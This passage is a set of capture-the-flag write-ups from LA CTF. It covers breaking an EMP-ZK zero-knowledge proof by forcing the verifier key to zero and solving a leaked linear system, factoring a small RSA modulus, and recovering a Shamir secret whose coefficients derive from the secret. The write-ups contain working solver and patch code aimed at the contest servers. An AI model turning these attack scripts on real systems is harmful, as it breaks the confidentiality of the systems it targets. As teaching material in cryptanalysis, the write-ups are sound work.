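A quick model of the broken bounds (hypothetical `start`/`task_n` values) shows the loop body runs exactly once:

```python
# Mirrors `for (i = start + task_n - 1; i < start + task_n; ++i)`.
start, task_n = 5, 100                           # hypothetical batch bounds
idxs = list(range(start + task_n - 1, start + task_n))
assert idxs == [104]                             # only the last gate is checked
```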

So, per connection, the verifier learns data about exactly one multiplication gate.

**Bug 2: Verifier MAC Key `delta` Can Be Forced to 0**

EMP-ZK’s arithmetic backend uses an information-theoretic MAC: `mac = key + delta * value (mod p)`, where `delta` is sampled by the verifier.

Nothing prevents choosing `delta = 0`. With `delta=0`, `mac == key` and the broken one-gate check becomes a linear relation between the (unknown) gate inputs instead of a quadratic.

We patch the verifier to set `delta=0` and to record the one checked multiplication gate’s transcript `(seed, V, ka, kb, kc)` plus `delta` (sanity).

**What The One-Gate Leak Gives**

Let the checked multiplication gate have secret inputs `a`, `b`, output `c = a*b`. The verifier’s per-wire keys are `ka`, `kb`, `kc` and the prover sends `V`.

From the check derivation, with `delta=0`:

`kb*a + ka*b = (V/seed) + kc (mod p)`

In this circuit, the checked gate is the final multiplication gate for `vec2`:

`a = g(X) = prod_{i=0..8} (vec2[i] + X)`\
`b = last + X` where `last = vec2[9]`

So each connection at chosen `X` yields:

`kb*g(X) + ka*(last + X) = rhs (mod p)` where `rhs = (V/seed) + kc`.

**Solve With One 10x10 Linear System (10 Connections)**

Write `g(X)` as a monic degree-9 polynomial:

`g(X) = c0 + c1*X + ... + c8*X^8 + X^9`

Rearrange the leaked equation into a linear equation in the 10 unknowns `(c0..c8, last)`:

`sum_{j=0..8} (kb*X^j)*c_j + ka*last = rhs - ka*X - kb*X^9`

Collect this for 10 distinct `X` values (we used `X=0..9`), solve the resulting 10x10 system over `F_p` with Gaussian elimination to recover:

1. `last = vec2[9]`
2. the coefficients `c0..c8` of `g(X)`
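The whole recovery can be simulated end to end: fake ten connections with fresh verifier keys each, then solve the 10x10 system with Gaussian elimination over `F_p` (a sketch under the leaked-relation form above; all names are illustrative):

```python
import random

p = 2**61 - 1
rng = random.Random(1)

vec2 = [rng.randrange(p) for _ in range(10)]     # server's fixed secret vector
last = vec2[9]

def g_coeffs(vals):
    """Coefficients (low -> high) of prod (v + X) over F_p."""
    c = [1]
    for v in vals:
        out = [0] * (len(c) + 1)
        for j, cj in enumerate(c):
            out[j] = (out[j] + v * cj) % p
            out[j + 1] = (out[j + 1] + cj) % p
        c = out
    return c

g = g_coeffs(vec2[:9])                           # degree 9, monic: g[9] == 1

rows, rhs = [], []
for X in range(10):                              # one simulated connection per X
    ka, kb, kc, seed = (rng.randrange(1, p) for _ in range(4))
    gX = sum(cj * pow(X, j, p) for j, cj in enumerate(g)) % p
    # Prover side: V is whatever satisfies kb*g(X) + ka*(last+X) = V/seed + kc.
    V = seed * ((kb * gX + ka * (last + X) - kc) % p) % p
    # Verifier side: ka, kb, kc, seed, V are all known -> one linear equation.
    rows.append([kb * pow(X, j, p) % p for j in range(9)] + [ka])
    rhs.append((V * pow(seed, -1, p) + kc - ka * X - kb * pow(X, 9, p)) % p)

# Gaussian elimination over F_p in the unknowns (c0..c8, last).
M = [row + [b] for row, b in zip(rows, rhs)]
for col in range(10):
    piv = next(r for r in range(col, 10) if M[r][col])
    M[col], M[piv] = M[piv], M[col]
    inv = pow(M[col][col], -1, p)
    M[col] = [x * inv % p for x in M[col]]
    for r in range(10):
        if r != col and M[r][col]:
            f = M[r][col]
            M[r] = [(x - f * y) % p for x, y in zip(M[r], M[col])]

sol = [M[r][10] for r in range(10)]
assert sol == g[:9] + [last]                     # c0..c8 and vec2[9] recovered
```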

**Factor To Recover The Other 9 Elements**

`g(X) = prod_{i=0..8} (vec2[i] + X)` so its roots are `X = -vec2[i]` for `i=0..8`.

Factor `g(X)` over `F_p` to get these linear factors, recover `vec2[i] = -root (mod p)`, and then submit the 10-element multiset `{vec2[0..9]}` as the guess for `vec1`.

This works because `vec1` is a permutation of `vec2`.
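A toy version over a small field shows the factoring step (the real solve factors the degree-9 `g` over `F_{2^61-1}`, e.g. with SageMath):

```python
# Over F_p, the roots of g(X) = prod (v + X) are exactly X = -v.
p = 101
vec = [3, 17, 42]                      # stand-ins for vec2[0..8]
g = [1]
for v in vec:                          # coefficients low -> high
    out = [0] * (len(g) + 1)
    for j, c in enumerate(g):
        out[j] = (out[j] + v * c) % p
        out[j + 1] = (out[j + 1] + c) % p
    g = out

roots = [x for x in range(p)
         if sum(c * pow(x, j, p) for j, c in enumerate(g)) % p == 0]
recovered = sorted((-r) % p for r in roots)
assert recovered == sorted(vec)
```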

**Notes On Connectivity**

EMP `NetIO` uses `inet_addr()` and does not resolve DNS hostnames. Use an IP (for LACTF it was `34.169.138.235`) via `--host` or `SLOW_GOLD_HOST`.

**Final Flag**

`lactf{1_h0p3_y0u_l1v3_th1s_0ne_t0_th3_fullest}`

***

#### Code

Below is all code used for the solve (patches + solver).

**1) Leak Struct (new)**

File: `attachments/dist/emp-zk/emp-zk/emp-zk-arith/leak.h`

```cpp
#ifndef EMP_ZK_ARITH_LEAK_H__
#define EMP_ZK_ARITH_LEAK_H__
// Minimal transcript capture for CTF solving (verifier-side).
// This is intentionally tiny and only records the broken mult-check's single gate.

#include <cstdint>

namespace emp {

struct EmpZkAndGateLeak {
  bool have = false;
  uint64_t delta = 0;

  // The coefficient used in the (broken) linear combination.
  uint64_t seed = 0;

  // Prover-sent check sums (before verifier mutates V).
  uint64_t U = 0;
  uint64_t V = 0;

  // Verifier-side keys for the single checked multiplication gate.
  uint64_t ka = 0;
  uint64_t kb = 0;
  uint64_t kc = 0;

  // Index in the andgate buffers (useful for sanity).
  uint32_t gate_i = 0;
};

extern EmpZkAndGateLeak g_emp_zk_andgate_leak;

} // namespace emp

#endif
```

**2) Define Global (new)**

File: `attachments/dist/emp-zk/emp-zk/emp-zk-arith/emp-zk-arith.cpp`

```cpp
#include "emp-zk/emp-zk-arith/leak.h"
#include "emp-zk/emp-zk-arith/zk_fp_exec.h"

ZKFpExec *ZKFpExec::zk_exec = nullptr;

namespace emp {
EmpZkAndGateLeak g_emp_zk_andgate_leak;
} // namespace emp
```

**3) Patch EMP-ZK: Force `delta=0` and Capture One-Gate Transcript**

File: `attachments/dist/emp-zk/emp-zk/emp-zk-arith/ostriple.h`

```cpp
// (snippet of the relevant changes only)

void andgate_correctness_check_manage() {
  io->flush();

  if (party == BOB) {
    emp::g_emp_zk_andgate_leak = emp::EmpZkAndGateLeak{};
    emp::g_emp_zk_andgate_leak.delta = LOW64(delta);
  }

  ...

  if (party == ALICE) {
    uint64_t check_sum[2];
    check_sum[0] = U;
    check_sum[1] = V;
    io->send_data(check_sum, 2 * sizeof(uint64_t));
  } else {
    uint64_t check_sum[2];
    io->recv_data(check_sum, 2 * sizeof(uint64_t));

    // Capture prover-sent values before mutating V.
    emp::g_emp_zk_andgate_leak.U = check_sum[0];
    emp::g_emp_zk_andgate_leak.V = check_sum[1];

    check_sum[1] = mult_mod(check_sum[1], delta);
    check_sum[1] = add_mod(check_sum[1], W);
    if (check_sum[0] != check_sum[1])
      error("multiplication gates check fails");
  }
  io->flush();
}

void andgate_correctness_check(uint64_t *ret, int thr_idx, uint32_t start,
                               uint32_t task_n, block *chi_seed) {
  ...
  uint64_t *chi = new uint64_t[task_n];
  uint64_t seed = mod(LOW64(chi_seed[thr_idx]));
  uni_hash_coeff_gen(chi, seed, 1);  // challenge bug: only 1 coefficient

  if (party == ALICE) {
    ...
  } else {
    for (uint32_t i = start + task_n - 1, k = 0; i < start + task_n; ++i, ++k) {
      ka = LOW64(left[i]);
      kb = LOW64(right[i]);
      kc = LOW64(gateout[i]);

      // Record verifier-side view of the single checked multiplication gate.
      emp::g_emp_zk_andgate_leak.have = true;
      emp::g_emp_zk_andgate_leak.seed = seed;
      emp::g_emp_zk_andgate_leak.ka = ka;
      emp::g_emp_zk_andgate_leak.kb = kb;
      emp::g_emp_zk_andgate_leak.kc = kc;
      emp::g_emp_zk_andgate_leak.gate_i = i;

      B = add_mod(mult_mod(ka, kb), mult_mod(kc, delta));
      W = add_mod(W, mult_mod(B, chi[k]));
    }
    ret[thr_idx] = W;
  }

  delete[] chi;
}

void delta_gen() {
  // Verifier-side only. Challenge exploit forces delta=0, making mac==key.
  // This is not validated by the protocol implementation.
  delta = 0;
}
```

**4) Patched Client: JSON Transcript Dump + Non-interactive Flag Fetch**

File: `attachments/dist/emp-zk/test/arith/client.cpp`

```cpp
#include "emp-tool/emp-tool.h"
#include "emp-zk/emp-zk-arith/leak.h"
#include "emp-zk/emp-zk.h"

#include <cstdint>
#include <cstdlib>
#include <cstring>
#include <iostream>
#include <string>
#include <vector>

using namespace emp;

static constexpr int kThreads = 1;

static void die_usage(const char *prog) {
  std::cerr << "usage: " << prog
            << " [--host HOST] [--port PORT] <X> dump|getflag [g0 g1 ... g9]\n";
  std::exit(2);
}

static uint64_t parse_u64(const char *s) {
  char *end = nullptr;
  errno = 0;
  unsigned long long v = std::strtoull(s, &end, 0);
  if (errno != 0 || end == s || (end && *end != '\0')) {
    std::cerr << "error: invalid u64: " << s << "\n";
    std::exit(2);
  }
  return static_cast<uint64_t>(v);
}

static int parse_i32(const char *s) {
  char *end = nullptr;
  errno = 0;
  long v = std::strtol(s, &end, 0);
  if (errno != 0 || end == s || (end && *end != '\0') || v < 0 ||
      v > 65535) {
    std::cerr << "error: invalid port: " << s << "\n";
    std::exit(2);
  }
  return static_cast<int>(v);
}

static void run_proof(BoolIO<NetIO> *ios[kThreads], int party, uint64_t X) {
  setup_zk_arith<BoolIO<NetIO>>(ios, kThreads, party);

  // Alice commits to two secret vectors; Bob uses dummy placeholders.
  std::vector<IntFp> array1;
  std::vector<IntFp> array2;
  array1.reserve(10);
  array2.reserve(10);
  for (int i = 0; i < 10; i++) {
    array1.emplace_back(0, ALICE);
    array2.emplace_back(0, ALICE);
  }

  // Challenge sends X over the arithmetic channel (not via stdio text).
  ZKFpExec::zk_exec->send_data(&X, sizeof(uint64_t));

  IntFp acc1 = IntFp(1, PUBLIC);
  IntFp acc2 = IntFp(1, PUBLIC);
  for (int i = 0; i < 10; i++) {
    acc1 = acc1 * (array1[i] + X);
    acc2 = acc2 * (array2[i] + X);
  }
  IntFp final_zero = acc1 + acc2.negate();
  batch_reveal_check_zero(&final_zero, 1);

  finalize_zk_arith<BoolIO<NetIO>>();
}

static void send_guesses(BoolIO<NetIO> *ios[kThreads],
                         const std::vector<uint64_t> &guesses) {
  if (guesses.size() != 10) {
    std::cerr << "internal error: expected 10 guesses\n";
    std::exit(2);
  }
  for (int i = 0; i < 10; i++) {
    uint64_t g = guesses[i];
    ios[0]->io->send_data(&g, sizeof(uint64_t));
  }
}

static void dump_json() {
  const auto &t = emp::g_emp_zk_andgate_leak;

  // One JSON object per line (consumed by solve.py).
  std::cout << "{";
  std::cout << "\"have\":" << (t.have ? "true" : "false");
  std::cout << ",\"delta\":" << t.delta;
  std::cout << ",\"seed\":" << t.seed;
  std::cout << ",\"U\":" << t.U;
  std::cout << ",\"V\":" << t.V;
  std::cout << ",\"ka\":" << t.ka;
  std::cout << ",\"kb\":" << t.kb;
  std::cout << ",\"kc\":" << t.kc;
  std::cout << ",\"gate_i\":" << t.gate_i;
  std::cout << "}\n";
  std::cout.flush();
}

int main(int argc, char **argv) {
  std::string host =
      std::getenv("SLOW_GOLD_HOST") ? std::getenv("SLOW_GOLD_HOST")
                                   : "chall.lac.tf";
  int port =
      std::getenv("SLOW_GOLD_PORT") ? parse_i32(std::getenv("SLOW_GOLD_PORT"))
                                   : 31183;

  int idx = 1;
  while (idx < argc) {
    if (std::strcmp(argv[idx], "--host") == 0) {
      if (idx + 1 >= argc)
        die_usage(argv[0]);
      host = argv[idx + 1];
      idx += 2;
      continue;
    }
    if (std::strcmp(argv[idx], "--port") == 0) {
      if (idx + 1 >= argc)
        die_usage(argv[0]);
      port = parse_i32(argv[idx + 1]);
      idx += 2;
      continue;
    }
    break;
  }

  if (idx + 2 > argc)
    die_usage(argv[0]);

  const uint64_t X = parse_u64(argv[idx]);
  const std::string mode = argv[idx + 1];
  idx += 2;

  std::vector<uint64_t> guesses;
  if (mode == "dump") {
    guesses.assign(10, 0);
  } else if (mode == "getflag") {
    if (idx + 10 != argc)
      die_usage(argv[0]);
    guesses.reserve(10);
    for (int i = 0; i < 10; i++)
      guesses.push_back(parse_u64(argv[idx + i]));
  } else {
    die_usage(argv[0]);
  }

  const int party = BOB;
  BoolIO<NetIO> *ios[kThreads];
  for (int i = 0; i < kThreads; ++i) {
    ios[i] = new BoolIO<NetIO>(new NetIO(host.c_str(), port), false);
  }

  run_proof(ios, party, X);
  send_guesses(ios, guesses);

  if (mode == "dump") {
    dump_json();
  } else {
    // Server sends exactly 46 bytes when guesses are correct.
    char flag[46];
    ios[0]->io->recv_data(flag, sizeof(flag));
    std::cout.write(flag, sizeof(flag));
    std::cout.flush();
  }

  for (int i = 0; i < kThreads; ++i) {
    delete ios[i]->io;
    delete ios[i];
  }
  return 0;
}
```

**5) Solver Script**

File: `solve.py`

```python
#!/usr/bin/env python3
import json
import os
import re
import subprocess
import sys
import time
from concurrent.futures import ThreadPoolExecutor, as_completed


P = 2305843009213693951  # 2^61 - 1
BIN = "attachments/dist/emp-zk/bin/test_arith_client"
# emp-tool's NetIO uses inet_addr() and does not resolve DNS names; use an IP.
HOST = os.environ.get("SLOW_GOLD_HOST", "34.169.138.235")
PORT = int(os.environ.get("SLOW_GOLD_PORT", "31183"))
LOCAL_CHALL_BIN = os.environ.get("SLOW_GOLD_LOCAL_CHALL_BIN")

# Keep concurrency low by default (remote services often rate-limit or queue).
WORKERS = int(os.environ.get("SLOW_GOLD_WORKERS", "1"))
DUMP_TIMEOUT_S = int(os.environ.get("SLOW_GOLD_DUMP_TIMEOUT_S", "1200"))
GETFLAG_TIMEOUT_S = int(os.environ.get("SLOW_GOLD_GETFLAG_TIMEOUT_S", "1200"))
RETRIES = int(os.environ.get("SLOW_GOLD_RETRIES", "3"))
DELAY_S = float(os.environ.get("SLOW_GOLD_DELAY_S", "0.25"))


def mod(x: int) -> int:
    return x % P


def inv(a: int) -> int:
    a %= P
    if a == 0:
        raise ZeroDivisionError("inv(0)")
    return pow(a, P - 2, P)


def run_dump(X: int) -> dict:
    # The binary prints exactly one JSON line in dump mode.
    last_err = None
    for attempt in range(1, RETRIES + 1):
        srv = None
        try:
            if LOCAL_CHALL_BIN:
                srv = subprocess.Popen(
                    [LOCAL_CHALL_BIN, str(PORT)],
                    stdout=subprocess.DEVNULL,
                    stderr=subprocess.DEVNULL,
                    text=False,
                )
                time.sleep(0.2)
            proc = subprocess.run(
                [BIN, "--host", HOST, "--port", str(PORT), str(X), "dump"],
                stdout=subprocess.PIPE,
                stderr=subprocess.DEVNULL,
                text=True,
                check=True,
                # The remote ZK proof is intentionally slow; keep this generous.
                timeout=DUMP_TIMEOUT_S,
            )
            lines = [ln.strip() for ln in proc.stdout.splitlines() if ln.strip()]
            for ln in reversed(lines):
                if ln.startswith("{") and ln.endswith("}"):
                    return json.loads(ln)
            raise RuntimeError(f"no JSON in output for X={X!r}: {proc.stdout!r}")
        except (subprocess.TimeoutExpired, subprocess.CalledProcessError, json.JSONDecodeError, RuntimeError) as e:
            last_err = e
        finally:
            if srv is not None:
                try:
                    srv.wait(timeout=1)
                except subprocess.TimeoutExpired:
                    srv.kill()
        # small backoff to avoid hammering
        time.sleep(0.25 * attempt)
    raise RuntimeError(f"run_dump failed for X={X} after {RETRIES} attempts: {last_err!r}")


def solve_linear_system_mod(A: list[list[int]], b: list[int]) -> list[int]:
    """Solve A x = b over F_p (Gaussian elimination)."""
    n = len(A)
    assert n > 0
    assert all(len(row) == n for row in A)
    assert len(b) == n

    M = [list(map(lambda x: x % P, row)) + [b[i] % P] for i, row in enumerate(A)]

    for col in range(n):
        pivot = None
        for row in range(col, n):
            if M[row][col] % P != 0:
                pivot = row
                break
        if pivot is None:
            raise RuntimeError("singular system")
        if pivot != col:
            M[col], M[pivot] = M[pivot], M[col]

        inv_p = inv(M[col][col])
        for j in range(col, n + 1):
            M[col][j] = mod(M[col][j] * inv_p)

        for row in range(n):
            if row == col:
                continue
            factor = M[row][col] % P
            if factor == 0:
                continue
            for j in range(col, n + 1):
                M[row][j] = mod(M[row][j] - factor * M[col][j])

    return [M[i][n] % P for i in range(n)]


def factor_roots_mod_prime(coeffs: list[int]) -> list[int]:
    from sympy import Poly, symbols

    x = symbols("x")
    poly = Poly(sum(int(coeffs[i]) * x**i for i in range(len(coeffs))), x, modulus=P)
    _, facs = poly.factor_list()
    roots = []
    for fac, exp in facs:
        if exp != 1:
            # vec2's elements are distinct, so a repeated factor means the
            # linear solve went wrong; fail loudly instead of mis-recovering.
            raise RuntimeError(f"unexpected repeated factor: {fac.as_expr()}^{exp}")
        if fac.degree() == 1:
            a, b = [int(c) for c in fac.all_coeffs()]  # a*x + b
            r = mod((-b) * inv(a))
            roots.append(r)
        else:
            raise RuntimeError(f"unexpected non-linear factor: {fac.as_expr()}")
    return roots


def main() -> int:
    # Unknowns: g(X)=c0+...+c8 X^8 + X^9 and last=vec2[9].
    # Each transcript at X gives:
    #   kb*g(X) + ka*(last + X) = (V/seed) + kc  (mod p)
    # which is linear in (c0..c8,last).
    xs = list(range(10))

    print(f"[+] fetching {len(xs)} transcripts with {WORKERS} workers...", flush=True)
    transcripts: dict[int, dict] = {}
    if WORKERS == 1:
        for X in xs:
            transcripts[X] = run_dump(X)
            print(f"[+] got transcript X={X}", flush=True)
            if DELAY_S:
                time.sleep(DELAY_S)
    else:
        with ThreadPoolExecutor(max_workers=WORKERS) as ex:
            futs = {ex.submit(run_dump, X): X for X in xs}
            for fut in as_completed(futs):
                X = futs[fut]
                transcripts[X] = fut.result()
                print(f"[+] got transcript X={X}", flush=True)
                if DELAY_S:
                    time.sleep(DELAY_S)

    A: list[list[int]] = []
    bvec: list[int] = []
    for X in xs:
        t = transcripts[X]
        if not t.get("have"):
            raise RuntimeError(f"missing leak (have=false) at X={X}")
        if int(t["delta"]) != 0:
            raise RuntimeError("expected delta=0 (patched client)")
        seed = int(t["seed"]) % P
        V = int(t["V"]) % P
        ka = int(t["ka"]) % P
        kb = int(t["kb"]) % P
        kc = int(t["kc"]) % P
        if seed == 0:
            raise RuntimeError("seed=0 (extremely unlikely), re-run")

        rhs = mod(mod(V * inv(seed)) + kc)  # (V/seed) + kc

        # kb*(sum_{j=0..8} c_j X^j + X^9) + ka*(last + X) = rhs
        # => sum_{j=0..8} (kb*X^j)*c_j + ka*last = rhs - ka*X - kb*X^9
        row = []
        xpow = 1
        for _j in range(9):
            row.append(mod(kb * xpow))
            xpow = mod(xpow * X)
        row.append(ka)  # last
        A.append(row)
        bvec.append(mod(rhs - ka * X - kb * xpow))  # xpow currently X^9

    sol = solve_linear_system_mod(A, bvec)
    coeffs = sol[:9] + [1]  # monic degree-9
    last_elem = sol[9]

    roots = factor_roots_mod_prime(coeffs)  # roots of g(x)==0 => x == -vec2[i] for i<9
    if len(roots) != 9:
        raise RuntimeError(f"expected 9 roots, got {len(roots)}")

    elems = [mod(-r) for r in roots] + [last_elem]
    elems = [int(e) for e in elems]
    if len(set(elems)) != 10:
        raise RuntimeError("elements not distinct; something went wrong")

    elems_sorted = sorted(elems)
    print("Recovered set (10 elements):")
    for e in elems_sorted:
        print(e)

    proc = subprocess.run(
        [BIN, "--host", HOST, "--port", str(PORT), "0", "getflag", *[str(e) for e in elems_sorted]],
        stdout=subprocess.PIPE,
        stderr=subprocess.DEVNULL,
        text=True,
        check=True,
        timeout=GETFLAG_TIMEOUT_S,
    )
    m = re.search(r"lactf\{[^}]*\}", proc.stdout)
    flag = m.group(0) if m else proc.stdout.strip()
    print("FLAG:", flag)
    if not (flag.startswith("lactf{") and flag.endswith("}")):
        raise RuntimeError("did not get a flag-shaped string")

    with open("flag.txt", "w", encoding="utf-8") as f:
        f.write(flag + "\n")

    return 0


if __name__ == "__main__":
    raise SystemExit(main())
```

### smol cats

#### Description

My cat walked across my keyboard and made this RSA implementation, encrypting the location of the treats they stole from me! However, they already got fed twice today, and are already overweight and needs to lose some weight, so I cannot let them eat more treats. Can you defeat my cat's encryption so I can find their secret stash of treats and keep my cat from overeating?

`nc chall.lac.tf 31224`

#### Solution

Connecting to the server presents an RSA challenge: given `n`, `e=65537`, and `c`, decrypt the ciphertext to recover the plaintext number of treats. The values change each connection.

The key insight is that the cat's primes really are tiny: the modulus `n` is \~200 bits (60 digits), composed of two \~100-bit primes. This is far too small for secure RSA and can be factored quickly using ECM (Elliptic Curve Method) or other factoring algorithms.

Once `n` is factored into `p * q`, standard RSA decryption recovers the plaintext: compute `phi = (p-1)(q-1)`, then `d = e^(-1) mod phi`, and `m = c^d mod n`.
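A minimal sketch of the same decryption on textbook-sized numbers (toy primes; trial division stands in for ECM at the real \~200-bit size):

```python
# Toy RSA with the classic primes 61 and 53 (illustrative only).
e = 65537
n = 61 * 53                     # 3233
c = pow(42, e, n)               # pretend the treat count is 42

# factor n by trial division (ECM does this job at real size)
p = next(d for d in range(2, n) if n % d == 0)
q = n // p

phi = (p - 1) * (q - 1)
d = pow(e, -1, phi)             # d = e^(-1) mod phi (Python 3.8+)
m = pow(c, d, n)                # m = c^d mod n
assert m == 42
```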

```python
#!/usr/bin/env sage
import re
from pwn import *
from sage.all import *

r = remote('chall.lac.tf', 31224)

data = r.recvuntil(b'How many treats do I want?')
text = data.decode()

n = int(re.search(r'n = (\d+)', text).group(1))
e = int(re.search(r'e = (\d+)', text).group(1))
c = int(re.search(r'c = (\d+)', text).group(1))

# Factor the small RSA modulus using SageMath's built-in factoring (ECM)
factors = factor(n)

# Compute phi(n)
phi = 1
for p, exp in factors:
    phi *= (p - 1) * p**(exp - 1)

# RSA decrypt
d = inverse_mod(e, phi)
m = power_mod(c, d, n)

r.sendline(str(m).encode())
print(r.recvall(timeout=5).decode())
r.close()
```

**Flag:** `lactf{sm0l_pr1m3s_4r3_n0t_s3cur3}`

### spreading-secrets

#### Description

The server uses Shamir Secret Sharing over a 512-bit prime field, but it generates the polynomial coefficients from an RNG seeded with the secret itself. Only one share is revealed: `(x, y) = (1, f(1))`, plus the modulus `p`.

#### Solution

In proper Shamir, `threshold` shares are needed because the non-constant coefficients are uniform random and independent of the secret.

Here, coefficients are deterministic functions of the secret:

* `c0 = s`
* `c1 = g(s)`
* `c2 = g(g(s)) = g^2(s)`
* ...
* `c9 = g^9(s)`

where `g(z) = a z^3 + b z^2 + c z + d (mod p)` is the RNG transition.

With only the share at `x=1`:

`f(1) = sum_{i=0..9} c_i = s + g(s) + g^2(s) + ... + g^9(s) = y`.

So `s` is a root of the univariate polynomial over `GF(p)`:

`h(x) = x + g(x) + g^2(x) + ... + g^9(x) - y`.

Since `deg(g)=3`, `deg(g^9)=3^9=19683`, so `h` has degree 19683. We build `h` by iterated composition in the polynomial ring `GF(p)[x]`.
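A scaled-down simulation shows why the single share determines `s`. The prime, RNG coefficients, and secret below are arbitrary, and brute force over the field stands in for the polynomial root extraction used at 512 bits:

```python
p = 10007
a, b, c, d = 3, 1, 4, 1  # toy RNG coefficients

def g(z):
    return (a * z**3 + b * z**2 + c * z + d) % p

secret = 1234
# share at x=1: f(1) = s + g(s) + g^2(s) + ... + g^9(s)
cs = [secret]
for _ in range(9):
    cs.append(g(cs[-1]))
y = sum(cs) % p

# Brute-force the root of h(x) = x + g(x) + ... + g^9(x) - y over GF(p):
sols = []
for s in range(p):
    acc, t = s, s
    for _ in range(9):
        t = g(t)
        acc = (acc + t) % p
    if acc == y:
        sols.append(s)
assert secret in sols
```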

To extract roots without fully factoring `h`, use the finite-field identity that the product of all distinct linear factors of `h` divides `x^p - x`. Thus:

`gcd(h(x), x^p - x)` is the squarefree product of linear factors of `h`.

Compute `x^p mod h(x)` by binary exponentiation (repeated squaring with polynomial modular reduction), then take the GCD and read its roots. There are two roots; the correct one decodes to a flag string.
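The distinct-roots identity can be verified at small scale with plain coefficient-list arithmetic (toy prime and polynomial, chosen for illustration; lists are low-degree-first):

```python
p = 103  # p % 4 == 3, so x^2 + 1 is irreducible mod p

def pmul(a, b):
    r = [0] * (len(a) + len(b) - 1)
    for i, ai in enumerate(a):
        for j, bj in enumerate(b):
            r[i + j] = (r[i + j] + ai * bj) % p
    return r

def pmod(a, m):
    a = a[:]
    while len(a) >= len(m):
        if a[-1] == 0:
            a.pop()
            continue
        q = a[-1] * pow(m[-1], -1, p) % p
        off = len(a) - len(m)
        for i, mi in enumerate(m):
            a[off + i] = (a[off + i] - q * mi) % p
        a.pop()
    while a and a[-1] == 0:
        a.pop()
    return a

def psub(a, b):
    n = max(len(a), len(b))
    r = [((a[i] if i < len(a) else 0) - (b[i] if i < len(b) else 0)) % p
         for i in range(n)]
    while r and r[-1] == 0:
        r.pop()
    return r

def pgcd(a, b):
    while b:
        a, b = b, pmod(a, b)
    inv = pow(a[-1], -1, p)
    return [c * inv % p for c in a]  # monic

# h = (x-3)(x-7)(x^2+1): two roots plus an irreducible quadratic factor
h = pmul(pmul([-3 % p, 1], [-7 % p, 1]), [1, 0, 1])

# x^p mod h by square-and-multiply
xp, base, e = [1], [0, 1], p
while e:
    if e & 1:
        xp = pmod(pmul(xp, base), h)
    base = pmod(pmul(base, base), h)
    e >>= 1

lin = pgcd(h, psub(xp, [0, 1]))  # gcd(h, x^p - x)
assert len(lin) - 1 == 2         # exactly the two linear factors survive
roots = {x0 for x0 in range(p)
         if sum(c * pow(x0, i, p) for i, c in enumerate(lin)) % p == 0}
assert roots == {3, 7}
```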

```python
# solve2.sage
import time

p = 12670098302188507742440574100120556372985016944156009521523684257469947870807586552014769435979834701674318132454810503226645543995288281801918123674138911
F = GF(p)
R.<x> = F[]

a_val = F(4378187236568178488156374902954033554168817612809876836185687985356955098509507459200406211027348332345207938363733672019865513005277165462577884966531159)
b_val = F(5998166089683146776473147900393246465728273146407202321254637450343601143170006002385750343013383427197663710513197549189847700541599566914287390375415919)
c_val = F(4686793799228153029935979752698557491405526130735717565192889910432631294797555886472384740255952748527852713105925980690986384345817550367242929172758571)
d_val = F(4434206240071905077800829033789797199713643458206586525895301388157719638163994101476076768832337473337639479654350629169805328840025579672685071683035027)

y1 = F(6435837956013280115905597517488571345655611296436677708042037032302040770233786701092776352064370211838708484430835996068916818951183247574887417224511655)

def g(poly):
    return a_val * poly^3 + b_val * poly^2 + c_val * poly + d_val

print("Building polynomial...", flush=True)
t0 = time.time()
P = x
total = P
for i in range(9):
    t = time.time()
    P = g(P)
    total += P
    print(f"  Step {i+1}/9, degree: {P.degree()}, time: {time.time()-t:.2f}s", flush=True)

h = total - y1
print(f"Total polynomial degree: {h.degree()}, build time: {time.time()-t0:.2f}s", flush=True)

print("Computing x^p mod h(x) via repeated squaring...", flush=True)
t0 = time.time()
p_bits = bin(p)[2:]
n_bits = len(p_bits)
print(f"  p has {n_bits} bits", flush=True)

xpow = x % h
for i, bit in enumerate(p_bits[1:], 1):
    xpow = (xpow * xpow) % h
    if bit == "1":
        xpow = (xpow * x) % h
    if i % 25 == 0:
        elapsed = time.time() - t0
        rate = i / elapsed if elapsed > 0 else 0
        eta = (n_bits - 1 - i) / rate if rate > 0 else 0
        print(f"  Bit {i}/{n_bits-1}, elapsed: {elapsed:.1f}s, ETA: {eta:.1f}s", flush=True)

print(f"x^p mod h computed in {time.time()-t0:.1f}s", flush=True)

print("Computing GCD...", flush=True)
t = time.time()
linear_factors = gcd(h, xpow - x)
print(f"GCD degree: {linear_factors.degree()}, time: {time.time()-t:.1f}s", flush=True)

roots = linear_factors.roots(multiplicities=False)
print(f"Found {len(roots)} roots", flush=True)
for root in roots:
    s = int(root)
    flag_bytes = s.to_bytes((s.bit_length() + 7) // 8, "big")
    if b"lactf{" in flag_bytes:
        print(flag_bytes.decode())
```

Flag: `lactf{d0nt_d3r1v3_th3_wh0l3_p0lyn0m14l_fr0m_th3_s3cr3t_t00!!!}`

### the-clock

#### Description

Don't run out of time

A Diffie-Hellman key exchange is performed on the "clock group" — points (x, y) satisfying x² + y² ≡ 1 (mod p) with the group law `(x1*y2 + y1*x2, y1*y2 - x1*x2)`. The prime p is omitted from the source. Alice and Bob exchange public keys, derive a shared secret, and use it to AES-ECB encrypt the flag. We're given both public keys and the ciphertext.

#### Solution

**Step 1: Recover p.** Each point satisfies x² + y² ≡ 1 (mod p), so p divides (x² + y² - 1) for every known point. Taking the GCD of these values across the base point and both public keys yields p = 13767529254441196841515381394007440393432406281042568706344277693298736356611.

**Step 2: Identify the group structure.** The clock group operation is equivalent to multiplication of elements z = y + ix in F\_{p²} restricted to norm-1 elements. This group has order p+1 when -1 is a quadratic non-residue mod p (which it is here). The order p+1 is completely smooth, factoring as 2² × 39623 × 41849 × 42773 × 46511 × 47951 × 50587 × 50741 × 51971 × 54983 × 55511 × 56377 × 58733 × 61843 × 63391 × 63839 × 64489, with every odd prime factor \~16 bits.
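Both claims in this step can be checked directly at toy scale (illustrative prime p = 11):

```python
p = 11  # 11 % 4 == 3, so -1 is a non-residue and i^2 = -1 gives F_{p^2}

def clockadd(P1, P2):
    x1, y1 = P1
    x2, y2 = P2
    return ((x1 * y2 + y1 * x2) % p, (y1 * y2 - x1 * x2) % p)

def fp2_mul(a, b):
    # (a0 + a1*i)(b0 + b1*i) with i^2 = -1
    a0, a1 = a
    b0, b1 = b
    return ((a0 * b0 - a1 * b1) % p, (a0 * b1 + a1 * b0) % p)

# clock addition of (x, y) is multiplication of z = y + i*x
for P1 in [(3, 5), (7, 2)]:
    for P2 in [(1, 9), (4, 4)]:
        x3, y3 = clockadd(P1, P2)
        assert fp2_mul((P1[1], P1[0]), (P2[1], P2[0])) == (y3, x3)

# the norm-1 points number exactly p + 1 ...
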